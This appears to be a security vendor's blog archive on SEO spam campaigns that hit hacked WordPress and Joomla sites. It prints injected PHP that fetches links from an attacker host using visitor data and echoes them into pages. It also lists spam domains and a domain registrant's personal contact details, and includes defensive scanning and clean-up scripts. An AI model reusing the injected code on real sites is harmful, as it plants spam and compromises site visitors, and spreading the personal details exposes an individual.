Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that the site is likely compromised. How do we know that? We have been tracking a large blackhat SEO spam campaign (targeting WordPress sites), and we noticed that for the last few days one of its link distribution domains was broken and returning an error. So any hacked site would display that error instead of the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        // Builds a request to the attackers' link server, forwarding the
        // visitor's IP address, User-Agent and Referer so the server can
        // decide what (if anything) to serve to this visitor.
        $url = "http://apollos.com.tw/LHRS/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
        // Fetches the response (normally the spam links); this is where the
        // broken link server started returning the "python" error text.
        $answer = file_get_contents($url);
        // Unless the server answers "noredirect", whatever was fetched is
        // printed at the top of the page.
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a python error instead…
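A quick way to find this kind of injection on disk is to look for the pattern itself rather than a fixed string: a URL built from the visitor's `$_SERVER` data, fetched with `file_get_contents()`, and echoed straight into the page. The scanner below is an added example written for this post, not Sucuri's tooling; its heuristics, the `scan_php()` and `Finding` names, and the sample snippets are all assumptions of the example (the injected sample is the snippet shown above, with the dots entity-encoded the way the blog rendered them).

```python
import html
import re
from dataclasses import dataclass
from typing import List, Set

# Link-distribution hosts the post names for this campaign.
KNOWN_SPAM_HOSTS = {
    "apollos.com.tw", "coolbloglinks.com", "iqitiq.com",
    "readerspot.com", "tsarstvonebesnoe.ru", "wat.az",
}

# $_SERVER entries the injected snippet forwards to the link server.
VISITOR_KEYS = ("REMOTE_ADDR", "HTTP_USER_AGENT", "HTTP_REFERER")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
ASSIGN_URL_RE = re.compile(r"\$(\w+)\s*=\s*[\"']https?://")
FETCH_RE = re.compile(
    r"\$(\w+)\s*=\s*@?file_get_contents\s*\(\s*(?:\$(\w+)|[\"']https?://)")
ECHO_RE = re.compile(r"\b(?:echo|print)\s+\$(\w+)\b")


@dataclass(frozen=True)
class Finding:
    line: int
    reason: str


def scan_php(source: str) -> List[Finding]:
    """Heuristically flag the fetch-remote-content-and-echo-it pattern in one PHP file."""
    # Blog renderers entity-encode dots (apollos&#46com); decode first so the
    # host matches in either form.
    text = html.unescape(source)
    url_vars: Set[str] = set()   # variables assigned a literal http(s) URL
    fetched: Set[str] = set()    # variables filled by a remote fetch
    findings: List[Finding] = []

    for num, line in enumerate(text.splitlines(), 1):
        hosts = {h.lower() for h in URL_RE.findall(line)}
        for host in sorted(hosts & KNOWN_SPAM_HOSTS):
            findings.append(Finding(num, f"known campaign host {host}"))

        # A URL assembled from visitor data is the fingerprint of this family.
        if "http" in line and "$_SERVER[" in line:
            keys = [k for k in VISITOR_KEYS if k in line]
            if keys:
                findings.append(Finding(num, "URL built from visitor data: " + ", ".join(keys)))

        m = ASSIGN_URL_RE.search(line)
        if m:
            url_vars.add(m.group(1))

        # Only count file_get_contents() as a remote fetch when its argument is
        # a URL literal or a variable that was assigned one (local reads are normal).
        m = FETCH_RE.search(line)
        if m and (m.group(2) is None or m.group(2) in url_vars):
            fetched.add(m.group(1))
            findings.append(Finding(num, f"remote fetch into ${m.group(1)}"))

        m = ECHO_RE.search(line)
        if m and m.group(1) in fetched:
            findings.append(Finding(num, f"remotely fetched ${m.group(1)} echoed into the page"))

    return findings


# Constructed sample: the injected snippet from the hacked index.php, with dots
# entity-encoded the way the blog rendered them.
INJECTED_SNIPPET = """<?php
$url = "http://apollos&#46com&#46tw/LHRS/12/request&#46php?ip="&#46$_SERVER['REMOTE_ADDR']&#46"&useragent="&#46urlencode($_SERVER['HTTP_USER_AGENT'])&#46"&referer="&#46urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
    echo $answer;
}
?>"""

# Constructed sample of a harmless local read that must not be flagged.
CLEAN_SNIPPET = """<?php
$tpl = file_get_contents(__DIR__ . '/header.html');
echo $tpl;
?>"""


if __name__ == "__main__":
    import sys
    targets = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]]
    for name, src in targets or [("sample", INJECTED_SNIPPET)]:
        for f in scan_php(src):
            print(f"{name}:{f.line}: {f.reason}")
```

Run it over a theme's or core's `.php` files; a hit that combines "URL built from visitor data", a remote fetch and an echo of the fetched variable is worth a manual look even when the host is not in the known list, since the campaign rotates domains.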

These are some other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by basicpills.com, and many other pharma-related domains (mostly located at 212.117.161.190 and 212.117.168.214).

The method used is very simple: the attackers inject a single spam link into every post of the web site (generally WordPress). These are some of the links you will see on an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html">lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making the links very hard to detect and delete. These are some of the domains being used:

247pharmaceutical.com
acomplia-online-price.com
acomplia-online-price.net
amoxil-cheap.net
amoxilpharm.com
ampicillin-pharm.com
ampicillin-pharm.net
ampicillin-pills.com
ampicillinpills.com
ampicillin-pills.net
ampicillinpills.net
antibioticsordrer.com
antibiotics-shop.com
basicpills.com
buydiflucancheap.com
buyflagylcheap.com
buylasixcheap.com
buyLasixcheap.com
buylevaquincheap.com
buynolvadexcheap.com
camagracheap.com
camagracheap.net
camagra-pharm.com
camagra-pharm.net
cheappillsonline.net
cialis-online-price.com
cialis-online-price.net
cialis-pharm.com
cytotecbuyonline.com
dacompliasale.com
dlevitraonline.com
dzithromaxsbuy.com
e-pharmacy-online.com
generic-ed-pharmacy.com
getrxpills.com
great-levitra.com
healthcarexyz.com
kamagrasorder.com
levitra-online-price.net
onlineacompliacheap.com
onlineacompliacheap.net
onlinecialischeap.com
onlinecialischeap.net
onlinelevitracheap.com
onlinelevitracheap.net
onlineviagracheap.com
onlineviagracheap.net
peampicillinonline.com
rx-prices.com
sclomidbuy.com
sdoxycyclinebuy.com
softviagraonline.com
spropecia-online.com
spropecia-online.net
sviagrarbuy.com
viagra-online-price.com
viagra-online-price.net
vicialisabuy.com
webemed.com
westernunion-locations.com
women-health-shop.com
wpropecianonline.com

Some of these domains are registered through GoDaddy by:

Administrative Contact:
York, Steve york71steve@yahoo.com
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.

If you need help cleaning up the mess, send us an email support@sucuri.net, or visit us over at Sucuri.

If you have any questions or comments, please let us know.

Link injection on hacked WordPress sites – Blackhat SEO spam

The last few months we’ve been tracking, and helping webmasters affected by a very large blackhat SEO spam campaign initiated by basicpills.com, and many other domains located at 212.117.161.190.

This campaign has infected thousands of WordPress sites, and has injected spam links directly into their databases (the wp-post table). These are some of the links you will see in an infected site:

<a href="http://basicpills . com/">online prescription drugs without  a prescription..

<a href="http://generic-ed-pharmacy . com/">Buy  Generic  Viagra Onlin.

<a href="http://getrxpills . com/buy/levi tra.html">lev itra 10 mg..


Read More

Solution for the link injection spam from basicpills

We recently posted about a large scale blackhat SEO campaign by basicpills that infected thousands of WordPress sites over the last few weeks. A lot of people contacted us for help and asked for directions on how to remove those links from all their posts. On large WordPress sites, it can be a very tedious task to go through thousands of posts manually removing each spam link…

To help out, we posted a clean up script here http://tools.sucuri.net/malware/helpers/spam-postremoval.txt for anyone that needs to clean up their site. It will remove link spam from the 4 domains that are the most commonly used in this attack:

Read More

Link injection, basicpills dot com and Blackhat SEO spam

For the last few weeks we’ve been tracking a very large blackhat SEO spam campaign initiated by basicpills.com, generic-ed-pharmacy.com, getrxpills.com and a few other domains (all located at 212.117.161.190).

They basically infected thousands of WordPress sites and injected spam links directly into their databases (the wp-post table). These are some of the links you will see on an infected site:

<a href="http://basicpills . com/">online prescription drugs without  a prescription..

<a href="http://generic-ed-pharmacy . com/">Buy  Generic  Viagra Onlin.

<a href="http://getrxpills . com/buy/levi tra.html">lev itra 10 mg..

What is very annoying for the infected site owners is that those links appear in the middle of the text (sometimes in the middle of other tags). This typically occurs in ALL of their posts making it hard to identify where the dirty links are, and even more of a challenge to remove them. In some of these sites, we’ve seen the attackers create new admin users allowing access back to the site at any time.

Read More
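The clean-up problem described in this post and in the "Solution for the link injection spam" post above comes down to one operation: walk every post's content, drop each anchor whose hostname belongs to one of the spam domains, and leave everything else untouched, including anchors that sit inside other tags. The script below is an added example written for these posts, not the spam-postremoval.txt helper linked above; the `strip_spam_anchors()` and `clean_posts()` names, the choice of four domains, and the constructed post rows are assumptions of the example, as is the decision to strip whitespace out of hosts written like "basicpills . com" before parsing them.

```python
import re
from typing import Iterable, List, Set, Tuple
from urllib.parse import urlsplit

# Four of the domains named in these posts; extend from the full list above.
SPAM_DOMAINS: Set[str] = {
    "basicpills.com", "generic-ed-pharmacy.com", "getrxpills.com", "webemed.com",
}

# Matches a complete <a ...>text</a> element wherever it sits in the HTML,
# so anchors injected in the middle of other tags are caught too.
ANCHOR_RE = re.compile(
    r"<a\b[^>]*\bhref\s*=\s*([\"'])(.*?)\1[^>]*>(.*?)</a\s*>",
    re.IGNORECASE | re.DOTALL,
)


def host_of(href: str) -> str:
    """Hostname of an href, whitespace removed and a leading 'www.' dropped."""
    # Assumption of this example: hosts written as "basicpills . com" are the
    # same host with whitespace inserted, so strip it before parsing.
    compact = re.sub(r"\s+", "", href)
    try:
        host = (urlsplit(compact).hostname or "").lower()
    except ValueError:  # malformed href (e.g. bad IPv6 literal)
        return ""
    return host[4:] if host.startswith("www.") else host


def is_spam_host(host: str, spam_domains: Set[str]) -> bool:
    """True for the domain itself or any subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in spam_domains)


def strip_spam_anchors(content: str, spam_domains: Set[str] = SPAM_DOMAINS) -> Tuple[str, int]:
    """Remove anchors pointing at spam domains; return (cleaned, removed_count)."""
    removed = 0

    def replace(m):
        nonlocal removed
        if is_spam_host(host_of(m.group(2)), spam_domains):
            removed += 1
            return ""          # drop the whole <a>...</a>, anchor text included
        return m.group(0)      # keep legitimate links byte-for-byte

    return ANCHOR_RE.sub(replace, content), removed


def clean_posts(rows: Iterable[Tuple[int, str]],
                spam_domains: Set[str] = SPAM_DOMAINS) -> List[Tuple[int, str, int]]:
    """Return (post_id, cleaned_content, removed) for every post that changed."""
    changed = []
    for post_id, content in rows:
        cleaned, removed = strip_spam_anchors(content, spam_domains)
        if removed:
            changed.append((post_id, cleaned, removed))
    return changed


# Constructed sample rows standing in for (ID, post_content) from wp_posts.
POSTS = [
    (1, 'Take one tablet daily <a href="http://basicpills . com/">online prescription '
        'drugs without a prescription</a> with water.'),
    (2, '<p>See <a href="https://example.org/docs">our docs</a> for details.</p>'),
    (3, '<strong>Bold <a href="http://www.getrxpills.com/buy/levitra.html">lev itra 10 mg</a> '
        'text</strong> and <a href="http://generic-ed-pharmacy.com/">Buy Generic Viagra Onlin</a>.'),
]

if __name__ == "__main__":
    for post_id, cleaned, removed in clean_posts(POSTS):
        print(f"post {post_id}: removed {removed} link(s) -> {cleaned!r}")
```

On a live site the rows would come from a `SELECT ID, post_content FROM wp_posts` query and the cleaned content would be written back with an `UPDATE`, after taking a database backup; only posts with a non-zero `removed` count need to be touched, which keeps the change set reviewable.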

Grameen Bank web site hacked / infected with spam

The Grameen Bank is in the news today after one of its founders, Muhammad Yunus, was fired from it. You can see the news about it here.

Leaving the politics aside, what interested us is that their main web site is currently hacked and infected with blackhat SEO spam. We tried to contact them a few weeks ago about it, but got no reply (and the site remains hacked).

Even Google recently started to warn users about it with the following message: “This site may be compromised.” in the search results. Just search for “inurl:grameen.com” to verify it.

Grameen bank malware

How did they get hacked? They are running a very old version of Joomla, which is probably how the attackers got in. Our malware / spam scanner also finds the injected spam, which is displayed only to crawlers (not to normal users), a common blackhat SEO technique to increase page rank.

This is the result of our scanner: http://sitecheck.sucuri.net/scanner/?scan=http://www.grameen.com/.

This shows again the importance of keeping your sites updated and always monitored.

UCalgary web sites compromised with spam

We were cleaning up a compromised site today (with the infamous pharma hack) when we saw multiple spam links in the hacked site pointing to ucalgary.ca (a big Canadian university). What was interesting is that they were not pointing to a small department sub-domain, but to their main site.

It means attackers were using domains at the University of Calgary to help increase their PR (page rank) and to sell pharmacy related products online.

These were some of the links in their main site that were being used (still live):

Read More

Thailand official foreign affairs / embassy web sites hacked

The Royal Thai (Thailand’s) consulate and embassy web sites (part of their foreign affairs ministry) are currently hacked and infected with a lot of spam (of the pharmacy kind).

Their web site is located at http://www.mfa.go.th and with a quick scan (using our scanner) we can see all the hidden content:

Plus, all their pages have multiple hidden links used in blackhat SEO spam campaigns:

Read More

Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number of Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and running vulnerable, old versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

Read More

Weekly Malware Update – 2010/Feb/11

Weekly malware update. You can track all updates by following our malware_updates category.

* If your site has been affected by any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help, or if you want to share some information with us.

Pharma / Blackhat SEO Spam by stat-tracker.info and others

We are tracking a large number of web sites that got hacked and are redirecting users to pharmacy-related domains. All the sites had the following code added to their PHP files:

The injected code redirects the visitor only if they arrived from a search engine. Domains used in these attacks (among many others):

stat-tracker.info
listita.info
babbyboom.ru
startds.net
agency-translation.com
bbt-tv.ru
dl.newsite.in

They just act as an intermediary before sending the user to sites like http://centerpills.com/ and similar (to buy fake pharmacy related products).

For hosting providers, I recommend blocking the following IP addresses: 178.238.134.8, 194.28.172.37 and 88.198.16.186.

All the infected sites were running old or vulnerable versions of web applications. So make sure to keep your sites updated!


To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.